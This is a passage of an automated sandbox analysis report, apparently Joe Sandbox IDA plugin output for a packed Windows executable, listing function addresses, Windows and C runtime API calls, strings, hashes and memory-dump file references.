__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6399BE0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6399BE1B8

Strings

csm, xrefs: 00007FF6399BDE06
csm, xrefs: 00007FF6399BDD9F
csm, xrefs: 00007FF6399BDE80

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction ID: be69ab4e69ac48f3952225d81e177e4215e21436fb178db1042bd068d56b4a83
Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
Instruction Fuzzy Hash: 74D17B72A087418AEB249FA5D4403AD37B6FB55788F184235EA4D97BDADF3CE480DB40

Function 00007FFE1A4961AA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A496690: RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A4966D4
Part of subcall function 00007FFE1A496690: RaiseException.KERNEL32 ref: 00007FFE1A49671A

RtlPcToFileHeader.KERNEL32 ref: 00007FFE1A496247
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE1A4962A3

Strings

Bad read pointer - no RTTI data!, xrefs: 00007FFE1A4963A8
Bad dynamic_cast!, xrefs: 00007FFE1A496312
Attempted a typeid of nullptr pointer!, xrefs: 00007FFE1A496385
Access violation - no RTTI data!, xrefs: 00007FFE1A4961AA, 00007FFE1A4963CB

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
Instruction ID: 7bdbbdb918b00e0409b047d23eb28df2d0cba4c7cd99debcf32b591b946ba557
Opcode Fuzzy Hash: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
Instruction Fuzzy Hash: 46516D22B19E8692EA30DF66E4915B9A360FB48FA4F5041B7DA4F03A75DF3CE525C700

Function 00007FFDFF19D3B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19D424
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19D433
DName::operator+=.LIBVCRUNTIME ref: 00007FFDFF19D550

Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B995
Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B9CE
Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BCF7

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19D4D3
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19D4E3
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19D58D

Strings

{for , xrefs: 00007FFDFF19D45C

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: {for
API String ID: 179159573-864106941
Opcode ID: 18417649adf341efaa8c743697161fb431a91f9fc4cc225e5c47d88e7276bc31
Instruction ID: 4965faecac8ca5e44b44d300122f6350b408662471b9671661dee1b32c6df618
Opcode Fuzzy Hash: 18417649adf341efaa8c743697161fb431a91f9fc4cc225e5c47d88e7276bc31
Instruction Fuzzy Hash: FA511873B08A85A9F7219F24D4607E837A1EB4578CF809231EA6C47ADDEF78D654C780

Function 00007FFDFF21215C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF168670: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF16867F
Part of subcall function 00007FFDFF168670: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF16868D
Part of subcall function 00007FFDFF168670: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686A1
Part of subcall function 00007FFDFF168670: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA,?,?,?,00007FFDFF167561), ref: 00007FFDFF1686BB

Part of subcall function 00007FFDFF211E80: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FFDFF211EC0

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000,?,00000007,?), ref: 00007FFDFF212227
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000,?,00000007,?), ref: 00007FFDFF21225D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,?,00000007,?), ref: 00007FFDFF21226A
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,00000000,?,00000007,?), ref: 00007FFDFF2122BC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,?,00000007,?), ref: 00007FFDFF2122C9

Strings

., xrefs: 00007FFDFF2121E5
:, xrefs: 00007FFDFF2121D3

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLast$FullNamePath$Value$CurrentDirectory
String ID: .$:
API String ID: 3777840885-4202072812
Opcode ID: 0c509b874ff73b2005516c46db5b2dd82bbc32d846c9d5dce7325f33c88dfb4f
Instruction ID: 1b639e0d5ad172b5efdbf36014e9830a2ce42b73dd4933114f8674eb35538425
Opcode Fuzzy Hash: 0c509b874ff73b2005516c46db5b2dd82bbc32d846c9d5dce7325f33c88dfb4f
Instruction Fuzzy Hash: 85515022F08613A9FB11ABB098609BD27A0AF54754F500635EE3DE7BDEDF7CA4418358

Function 00007FF6399CE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6399CE3BA,?,?,0000024622EC6A18,00007FF6399CA063,?,?,?,00007FF6399C9F5A,?,?,?,00007FF6399C524E), ref: 00007FF6399CE19C
GetProcAddress.KERNEL32(?,?,?,00007FF6399CE3BA,?,?,0000024622EC6A18,00007FF6399CA063,?,?,?,00007FF6399C9F5A,?,?,?,00007FF6399C524E), ref: 00007FF6399CE1A8

Strings

ext-ms-, xrefs: 00007FF6399CE0F9
api-ms-, xrefs: 00007FF6399CE0E6

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: 85eb7221287fff1d5a213cf0af7511734a256e2e29c285743cb30f9121d4e54d
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: F141CF21F19A0286EB268F56AC006752293BF45BA0F0D4135DD0EC77CEEE3CE885AF40

Function 00007FF6399B7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6399B3834), ref: 00007FF6399B7CE4
CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF6399B3834), ref: 00007FF6399B7D2C

Part of subcall function 00007FF6399B7E10: GetEnvironmentVariableW.KERNEL32(00007FF6399B365F), ref: 00007FF6399B7E47
Part of subcall function 00007FF6399B7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6399B7E69

Part of subcall function 00007FF6399C7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C7561

Part of subcall function 00007FF6399B26C0: MessageBoxW.USER32 ref: 00007FF6399B2736

Strings

TMP, xrefs: 00007FF6399B7CA2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6399B7CBC
_MEI%d, xrefs: 00007FF6399B7CF2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6399B7D5E
TMP, xrefs: 00007FF6399B7C7C, 00007FF6399B7D83

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
Instruction ID: b1cb2114d5c8f8c634ee8cef3f7cf102009a4b885aee3159c63c129c3c46d4e4
Opcode Fuzzy Hash: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
Instruction Fuzzy Hash: D1414C11A0D64281EA20AF6A9D952F91263EF957C0F884132D90EC7BDFEE3CE540AF40

Function 00007FFE1A496B5C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A496D1B,?,?,00000000,00007FFE1A496B4C,?,?,?,?,00007FFE1A496885), ref: 00007FFE1A496BE1
GetLastError.KERNEL32(?,?,?,00007FFE1A496D1B,?,?,00000000,00007FFE1A496B4C,?,?,?,?,00007FFE1A496885), ref: 00007FFE1A496BEF
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE1A496D1B,?,?,00000000,00007FFE1A496B4C,?,?,?,?,00007FFE1A496885), ref: 00007FFE1A496C08
LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A496D1B,?,?,00000000,00007FFE1A496B4C,?,?,?,?,00007FFE1A496885), ref: 00007FFE1A496C1A
FreeLibrary.KERNEL32(?,?,?,00007FFE1A496D1B,?,?,00000000,00007FFE1A496B4C,?,?,?,?,00007FFE1A496885), ref: 00007FFE1A496C60
GetProcAddress.KERNEL32(?,?,?,00007FFE1A496D1B,?,?,00000000,00007FFE1A496B4C,?,?,?,?,00007FFE1A496885), ref: 00007FFE1A496C6C

Strings

api-ms-, xrefs: 00007FFE1A496C01

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
String ID: api-ms-
API String ID: 916704608-2084034818
Opcode ID: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
Instruction ID: 1305ff66868f2632fe60533f27a6588a97f111d8e02aeb321bfbf6a33065b2c5
Opcode Fuzzy Hash: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
Instruction Fuzzy Hash: 61319C21B1AF5291EA319B07A8005B5B294FB4CFB4F5905B6ED1F0A7A4EF3CE174C200

Function 00007FFDFF198270 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBVCRUNTIME ref: 00007FFDFF19829D
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF198327

Strings

<ellipsis>, xrefs: 00007FFDFF198380
,..., xrefs: 00007FFDFF1982F4
..., xrefs: 00007FFDFF198370
void, xrefs: 00007FFDFF1983A5
,<ellipsis>, xrefs: 00007FFDFF198304

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ArgumentDecorator::getListName::operator+
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 953829080-2211150622
Opcode ID: 89f9c471a137c41639bb830cdbb2beaab193edc5de156836b20997b225bc8adb
Instruction ID: cc7ade264d8312de54710e8422b9fca038a35525afc070ed1b538b175c88ad50
Opcode Fuzzy Hash: 89f9c471a137c41639bb830cdbb2beaab193edc5de156836b20997b225bc8adb
Instruction Fuzzy Hash: 35413972F08B4688F7118F28E8606B837A0BB49748F885235CA6D9379DDF7CE644C794

Function 00007FFE14637294 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FFE146372A7
PyErr_SetString.PYTHON311 ref: 00007FFE146372CA
htons.WS2_32 ref: 00007FFE146372E7
PyLong_FromUnsignedLong.PYTHON311 ref: 00007FFE146372F0

Strings

htons: Python int too large to convert to C 16-bit unsigned integer, xrefs: 00007FFE146372DB
htons: can't convert negative Python int to C 16-bit unsigned integer, xrefs: 00007FFE146372B9
i:htons, xrefs: 00007FFE146372A0

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Arg_Err_FromLongLong_ParseSizeStringTuple_Unsignedhtons
String ID: htons: Python int too large to convert to C 16-bit unsigned integer$htons: can't convert negative Python int to C 16-bit unsigned integer$i:htons
API String ID: 1102113319-997571130
Opcode ID: 925eea274cc6b993a20bc0d02982b59ac172ba4b942efe6f1114c756d284c707
Instruction ID: b53841d6230354ea8395e0855b653759d98cdab0ca5dc88331a67cd3071edea1
Opcode Fuzzy Hash: 925eea274cc6b993a20bc0d02982b59ac172ba4b942efe6f1114c756d284c707
Instruction Fuzzy Hash: BEF0F961E08EC791EA54DB17E8D00B923A0AF467AAF9044B2E54E867B4DE3CF40CD780

Function 00007FFE1A492818 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4928D0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4928EE
__AdjustPointer.LIBCMT ref: 00007FFE1A49292F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A49293C
__AdjustPointer.LIBCMT ref: 00007FFE1A492978
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A49298D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4929D2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4929D9

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
Instruction ID: cea8916658e20b88c0b18d2cf85326b70932ae8ef1a8410260adef8efd4c9d20
Opcode Fuzzy Hash: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
Instruction Fuzzy Hash: 02518732B0AE5281EA75DB16944463862A4AF4CFA4F0945F7DA8F067B5DE3CE872C301

Function 00007FFE1A4929FC Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A492AB6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A492AD5
__AdjustPointer.LIBCMT ref: 00007FFE1A492B16
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A492B23
__AdjustPointer.LIBCMT ref: 00007FFE1A492B5F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A492B74
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A492BB9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A492BC0

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
Instruction ID: e237dcc4936e611a8aca3d430abe8335d0ccee5a1e56867f9d8f6ee8c3880179
Opcode Fuzzy Hash: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
Instruction Fuzzy Hash: 5051AA22B0AE5285EA759F17944467863E4AF4CFA1F0981FBCA4F067A5CE7CE4728300

Function 00007FFDFF160850 Relevance: 12.1, APIs: 8, Instructions: 108COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF160877
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160885
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF16089D
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF1608BD
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160933
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160960
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF160975

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a1f7aa499eaf6a9b86d7c54365549fe3ce9840eb339eee382db444e2e732c8b5
Instruction ID: 88081834ef400f5c0cc8a6332a5ee1c7c801e3b60b17ec62fa09dae5244b0818
Opcode Fuzzy Hash: a1f7aa499eaf6a9b86d7c54365549fe3ce9840eb339eee382db444e2e732c8b5
Instruction Fuzzy Hash: A4415E23F09B528AFB459B70E860ABD2365AF44764F144335E97E827DEEF3CA5418340

Function 00007FFDFF178C4B Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF178C6E
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF178C7C
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF178C94
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF178CB4
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1B0938
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1B0966
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1B0978
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF1B09A3

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a72d2ef499f671fbb7964a0b473ec585f506d5fae6ec9d60e47df6ee5f53bb0c
Instruction ID: d6781e40e5ab1e3ba19e40fc501e9b25eca177cbefbde9823e6977a4f2671d09
Opcode Fuzzy Hash: a72d2ef499f671fbb7964a0b473ec585f506d5fae6ec9d60e47df6ee5f53bb0c
Instruction Fuzzy Hash: EE313026F0AB4386FB589B25A474D7967A1AF85BA0F144334DA7E837D9DF3CE4418304

Function 00007FFDFF178FC0 Relevance: 12.1, APIs: 8, Instructions: 78COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF178FCF
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF178FDD
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF179008
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF1B0BF6
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF1B0C12
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF1B0C3F
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF1B0C51
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,8948ECD1,00007FFDFF178F87), ref: 00007FFDFF1B0C68

